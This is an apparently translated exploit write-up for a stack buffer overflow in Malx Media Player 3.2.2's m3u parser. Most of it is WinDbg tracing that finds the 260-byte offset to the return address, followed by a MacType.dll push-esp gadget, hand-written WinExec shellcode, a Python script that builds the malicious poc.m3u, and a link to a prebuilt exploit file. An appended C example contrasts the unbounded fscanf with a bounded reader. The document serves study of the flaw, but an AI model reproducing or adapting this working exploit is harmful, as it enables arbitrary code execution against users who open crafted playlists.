Malx Media Player 3.2.2 suffers a stack overflow when it parses a malformed m3u file, which lets an attacker take control of EIP and execute arbitrary code. (ROP on Win7 SP1 with MacType)
Malx Media Player sizes a stack buffer with MAX_PATH, but the vfscanf call that fills it never considers the input length, so the buffer overflows. Software: http://malx-media-player.software.informer.com/ Build a malformed M3U file, load it into the program, and enjoy the crash. A kvn backtrace of the call stack shows it went in through vfscanf, so MAX_PATH is almost certainly involved; next, find which function made the vfscanf call:
0:000> bp msvcrt!vfscanf
0:000> bl
 0 e 76cf574d 0001 (0001) 0:**** msvcrt!vfscanf
 1 eu 0001 (0001) (msvcrt!fscanf)
0:000> g
Breakpoint 0 hit
eax=0018f92c ebx=0018fb64 ecx=76c9a6db edx=0008e381 esi=76d22960 edi=76cf58b9
eip=76cf574d esp=0018f904 ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
msvcrt!vfscanf:
76cf574d 6a0c push 0Ch
Two gu commands later, we see it was entered from image00400000+0x46f0:
0:000> gu
eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9
eip=76cf58d4 esp=0018f908 ebp=0018f91c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
msvcrt!fscanf+0x1b:
76cf58d4 83c414 add esp,14h
0:000> gu
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
eax=00000001 ebx=0018fb64 ecx=76cf587e edx=76d22960 esi=76d22960 edi=76cf58b9
eip=004046f0 esp=0018f924 ebp=00000001 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
image00400000+0x46f0:
004046f0 83c40c add esp,0Ch
With no source and no symbols this is painful to read, so roughly narrow down the problem area first, then gu once more:
0:000> gu
(2304.288): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=01d5004c
eip=41414141 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
41414141 ?? ???
EIP jumped to 41414141, so the return address was overwritten. Start over: from image00400000+0x46f0 step with p all the way forward, and nothing goes wrong until the retn, so that retn must be the culprit:
Breakpoint 0 hit
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c
eip=00404744 esp=0018f93c ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
image00400000+0x4744:
00404744 81c408020000 add esp,208h
0:000> dd esp
0018f93c 0055334d 00000003 0088d550 00000016
0018f94c 00000000 01000003 00000000 00000016
0018f95c 00005765 0018f898 77aa57d0 0018f9d0
0018f96c 0018f99c 77ac0806 00870000 00000000
0018f97c 00870000 0088d108 77a1b8ea 0088d108
0018f98c 00870000 00870000 77a1b8ea 0088d108
0018f99c 0018f9e0 77ac17b0 00870138 77ac1794
0018f9ac 66f6ed3b 00870000 00870000 00000000
0:000> p
eax=00000000 ebx=75cf54f8 ecx=76c93dcf edx=0008e3c8 esi=00000000 edi=020e004c
eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
image00400000+0x474a:
0040474a c3 ret
Look at the stack at that point:
0:000> dd esp
0018fb44 41414141 41414141 41414141 41414141
0018fb54 41414141 41414141 41414141 41414141
0018fb64 41414141 41414141 41414141 41414141
0018fb74 41414141 41414141 41414141 41414141
0018fb84 43414141 43434343 43434343 43434343
0018fb94 43434343 43434343 43434343 43434343
0018fba4 43434343 43434343 43434343 43434343
0018fbb4 53434343 53535353 53535353 53535353
What a sad story... Since the second-to-last instruction is add esp,208h, let's wind back by that much and look:
0:000> dd esp-208 esp
0018f93c 0055334d 00000003 0088d550 00000016
0018f94c 00000000 01000003 00000000 00000016
0018f95c 00005765 0018f898 77aa57d0 0018f9d0
0018f96c 0018f99c 77ac0806 00870000 00000000
0018f97c 00870000 0088d108 77a1b8ea 0088d108
0018f98c 00870000 00870000 77a1b8ea 0088d108
0018f99c 0018f9e0 77ac17b0 00870138 77ac1794
0018f9ac 66f6ed3b 00870000 00870000 00000000
0018f9bc 00870000 00000000 01010000 0018f9ac
0018f9cc 00000068 0018fac4 77a671f5 114fc46b
0018f9dc fffffffe 77ac1794 77a7ac29 00870000
0018f9ec 50000063 77a238aa 66f6ee0f 00000000
0018f9fc 00870000 0088d110 00000000 00401270
0018fa0c 00000000 00de0706 00000084 00000000
0018fa1c 00680515 00000004 000003a8 00870000
0018fa2c 00000000 00000001 00000001 00000000
0018fa3c 00000000 415c3a41 41414141 41414141
0018fa4c 41414141 41414141 41414141 41414141
0018fa5c 41414141 41414141 41414141 41414141
0018fa6c 41414141 41414141 41414141 41414141
0018fa7c 41414141 41414141 41414141 41414141
0018fa8c 41414141 41414141 41414141 41414141
0018fa9c 41414141 41414141 41414141 41414141
0018faac 41414141 41414141 41414141 41414141
0018fabc 41414141 41414141 41414141 41414141
0018facc 41414141 41414141 41414141 41414141
0018fadc 41414141 41414141 41414141 41414141
0018faec 41414141 41414141 41414141 41414141
0018fafc 41414141 41414141 41414141 41414141
0018fb0c 41414141 41414141 41414141 41414141
0018fb1c 41414141 41414141 41414141 41414141
0018fb2c 41414141 41414141 41414141 41414141
0018fb3c 41414141 41414141 41414141
A sad story indeed... So at what offset does the overwritten retn address sit?
0:000> ?(18fa3c+4 - esp)
Evaluate expression: -260 = fffffefc
260, that familiar number; a disaster indeed. Hunting for ROP gadgets, MacType!ReloadConfig+0x24cca turns out to have one that fits the bill nicely:
----------------------
size 1
MacType!ReloadConfig+0x24cca:
1002756a 54 push esp
1002756b c3 ret
Since this is just practice, we won't bother with portability for now; look up the address of WinExec:
0:000> x kernel32!WinExec
768a2c51 kernel32!WinExec = <no type information>
That roughly sketches the original form of our shellcode:
ROP 6a750210 #1002756a; MacType!ReloadConfig+0x24cca, push esp; ret;
#Shellcode start
$    31C0         XOR EAX,EAX
$+2  50           PUSH EAX
$+3  B8 43414C43  MOV EAX,434C4143
$+8  50           PUSH EAX      ;"CALC\0"
$+9  89E1         MOV ECX,ESP   ;save the pointer to this string
$+B  40           INC EAX
$+C  50           PUSH EAX      ;uCmdShow == 1
$+D  51           PUSH ECX      ;lpCmdLine
$+E  E8 XXXXXXX   CALL WinExec
Strictly speaking it also needs MOV EBX,ESP; DEC EBX,80H; MOV EBP,EBX so that WinExec does not fail, and EAX should be zeroed with XOR EAX,EAX before the INC EAX. The above is the draft I scribbled earlier; I'm too lazy to paste the machine code, dropping it into OD will give you the bytes.
Edit the M3U file, load it, and run:
0:001> bp 40474a
*** WARNING: Unable to verify checksum for E:\Program Files (x86)\Mplay\mplay.exe
*** ERROR: Module load completed but symbols could not be loaded for E:\Program Files (x86)\Mplay\mplay.exe
0:001> g
Breakpoint 0 hit
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0040474a esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
mplay+0x474a:
0040474a c3 ret
0:000> p
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=1002756a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
*** WARNING: Unable to verify checksum for E:\Program Files (x86)\MacType\MacType.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Program Files (x86)\MacType\MacType.dll -
MacType!ReloadConfig+0x24cca:
1002756a 54 push esp
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=1002756b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
MacType!ReloadConfig+0x24ccb:
1002756b c3 ret
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb48 esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
0018fb48 31c0 xor eax,eax
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb4a esp=0018fb48 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb4a 50 push eax
0:000>
eax=00000000 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb4b esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb4b b843414c43 mov eax,434C4143h
0:000>
eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb50 esp=0018fb44 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb50 50 push eax
0:000>
eax=434c4143 ebx=75965550 ecx=77573dcf edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb51 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb51 89e1 mov ecx,esp
0:000>
eax=434c4143 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb53 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
0018fb53 40 inc eax
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb54 esp=0018fb40 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb54 50 push eax
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb55 esp=0018fb3c ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb55 51 push ecx
0:000>
eax=434c4144 ebx=75965550 ecx=0018fb40 edx=0008e3c8 esi=00000000 edi=0041004c
eip=0018fb56 esp=0018fb38 ebp=00000001 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
0018fb56 e8fb307176 call kernel32!WinExec+0x5 (768a2c56)
0:000> dd esp
0018fb38 0018fb40 434c4144 434c4143 00000000
0018fb48 b850c031 434c4143 40e18950 fbe85150
0018fb58 00767130 00000000 00000000 555c3a45
0018fb68 73726573 616c425c 53547473 7365445c
0018fb78 706f746b 6d2e375c 75007533 008fb710
0018fb88 00000000 ffffffec 00000000 020e4758
0018fb98 020e4758 008fb710 008fb710 0018fbe4
0018fba8 754a702c 008fb710 00000000 ffffffec
0:000> da 18fb40
0018fb40 "CALC"
Note: when the program is launched under the debugger, the MacType module does not get injected, so to try this out you have to let it start on its own and then attach. POC:
#!/usr/bin/env python3
# Writes poc.m3u: the #EXTM3U header, a NOP sled filling the 260 bytes up to the
# saved return address, the push esp; ret gadget address, then the shellcode.
print("blast off!")
filepath = "poc.m3u"
payload = (
    b"\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a"  # "#EXTM3U\r\n"
    + b"\x90" * 260                          # NOP sled: 260 bytes to the retn address
    + b"\x6a\x75\x02\x10"                    # 0x1002756a: push esp; ret (MacType.dll)
    + b"\x31\xc0\x50\xb8\x43\x41\x4c\x43"    # xor eax,eax; push eax; mov eax,"CALC"
    + b"\x50\x89\xe1\x40\x50\x51"            # push eax; mov ecx,esp; inc eax; push eax; push ecx
    + b"\xe8\xfb\x30\x71\x76\x00"            # call kernel32!WinExec (address not portable)
)
with open(filepath, "wb") as f:
    f.write(payload)
print("Done.\nOpen poc.m3u")
The prebuilt file: http://lno.pw/exp.m3u. To keep things simple, no portable technique was used, so adjust the WinExec address yourself.
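The root cause stated at the top of the writeup, a MAX_PATH-sized stack buffer filled by fscanf with no field width, as an added C example (not code from Malx Media Player or the author): the unbounded pattern beside a bounded reader that also flags any playlist entry long enough to have reached the saved return address. MAX_PATH is defined locally with the Windows value, and the sample playlist is constructed inline.

```c
#include <stdio.h>
#include <string.h>

#define MAX_PATH 260   /* Windows MAX_PATH, the size Malx gives its stack buffer */

/* The pattern the writeup describes: "%s" with no field width into a fixed
 * MAX_PATH buffer. A token of 260 bytes or more runs off the end of buf and
 * over the saved return address. Shown for contrast only; never call it. */
int read_entry_unbounded(FILE *fp, char buf[MAX_PATH]) {
    return fscanf(fp, "%s", buf);
}

/* Hardened form: fgets writes at most MAX_PATH-1 bytes plus the NUL. If the line
 * did not fit, the rest is drained so it is not parsed as a new entry, and
 * *truncated is set so the caller can reject the playlist. Returns -1 at EOF. */
int read_entry_bounded(FILE *fp, char buf[MAX_PATH], int *truncated) {
    *truncated = 0;
    if (!fgets(buf, MAX_PATH, fp)) return -1;
    size_t n = strcspn(buf, "\r\n");
    if (buf[n] == '\0' && n == MAX_PATH - 1) {   /* buffer full, no newline seen */
        int c;
        while ((c = fgetc(fp)) != EOF && c != '\n')
            if (c != '\r') *truncated = 1;       /* real bytes were cut off */
    }
    buf[n] = '\0';
    return (int)n;
}

/* Constructed sample: the #EXTM3U header, one 600-byte entry shaped like the
 * PoC's overlong line, then a normal path. Returns how many entries would have
 * overflowed the unbounded reader. */
int count_overlong_entries(void) {
    FILE *fp = tmpfile();
    if (!fp) return -1;
    fputs("#EXTM3U\r\n", fp);
    for (int i = 0; i < 600; i++) fputc('A', fp);
    fputs("\r\nC:\\music\\track.mp3\r\n", fp);
    rewind(fp);
    char buf[MAX_PATH];
    int truncated, len, overlong = 0;
    while ((len = read_entry_bounded(fp, buf, &truncated)) != -1) {
        if (len == 0 || buf[0] == '#') continue;   /* blank or directive line */
        if (truncated) overlong++;
    }
    fclose(fp);
    return overlong;
}
```

A parser built on read_entry_bounded never writes past the buffer, and a single truncated entry is enough reason to reject the whole playlist rather than play it.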